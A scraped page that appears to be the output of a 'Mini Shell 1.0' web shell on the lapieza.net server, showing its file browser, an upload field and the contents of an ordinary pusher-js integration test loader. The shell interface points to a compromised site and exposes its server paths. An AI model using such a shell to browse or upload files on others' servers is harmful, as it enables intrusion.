HOME


Mini Shell 1.0
La Pieza.DO | Todo lo que buscas!

Bienvenido de nuevo!

Acceso Cuenta Delivery
DIR: /var/www/devs.lapieza.net/node_modules/pusher-js/spec/javascripts/integration/
Upload File :
Current File : /var/www/devs.lapieza.net/node_modules/pusher-js/spec/javascripts/integration/index.web.js
// the webpack context API uses Object.keys and Array.prototype.forEach
// both of which are unavailable in old versions of IE.
require('../polyfills');

// there are some circular dependencies and there are type errors when requiring
// runtime before core/pusher
require('core/pusher');

var Runtime = require('runtime').default;
var TestEnv = require('testenv');

var testConfigs = getTestConfigs();

// We can access this 'env var' here because there's a webpack.DefinePlugin
// overwriting this value with whatever is set at compile time
if (process.env.MINIMAL_INTEGRATION_TESTS) {
  testConfigs = testConfigs.filter((config) => config.forceTLS && config.transport === "ws")
}

var sharedTestsContext = require.context("./core", true, /_spec$/);
sharedTestsContext.keys().forEach((key) => {
  sharedTestsContext(key)(testConfigs);
});

var webTestsContext = require.context("./web", true, /_spec$/);
webTestsContext.keys().forEach(webTestsContext);

function getTestConfigs() {
  var testConfigs = [{
    transport: "ws",
    forceTLS: true,
  },{
    transport: "ws",
    forceTLS: false,
  }];

  if (Runtime.isXHRSupported()) {
    // CORS-compatible browsers
    if (TestEnv !== "web" || !/Android 2\./i.test(navigator.userAgent)) {
      testConfigs.push({ transport: "xhr_streaming", forceTLS: true})
      testConfigs.push({ transport: "xhr_streaming", forceTLS: false})
    }
    testConfigs.push({transport: "xhr_polling", forceTLS: true})
    testConfigs.push({transport: "xhr_polling", forceTLS: false})

  } else if (Runtime.isXDRSupported(false)) {

    testConfigs.push({transport: "xdr_streaming", forceTLS: true})
    testConfigs.push({transport: "xdr_streaming", forceTLS: false})
    testConfigs.push({transport: "xdr_polling", forceTLS: true})
    testConfigs.push({transport: "xdr_polling", forceTLS: false})

    // IE can fall back to SockJS if protocols don't match
    // No SockJS TLS tests due to the way JS files are served
    testConfigs.push({transport: "sockjs", forceTLS: false})

  } else {
    // Browsers using SockJS
    testConfigs.push({ transport: "sockjs", forceTLS: true})
    testConfigs.push({ transport: "sockjs", forceTLS: false})
  }

  // Test all forceTLS: false before forceTLS: true
  // Because browsers prevent a URL from downgrading from HTTPS to HTTP
  // This is probably the result of Strict-Transport-Security header returned when calling the HTTPS endpoint.
  testConfigs.sort((a, b) => {
    if (a.forceTLS == false && b.forceTLS == true) {
      return -1;
    } else if (a.forceTLS == true && b.forceTLS == false) {
      return 1;
    } else {
      return 0;
    }
  })

  return testConfigs
}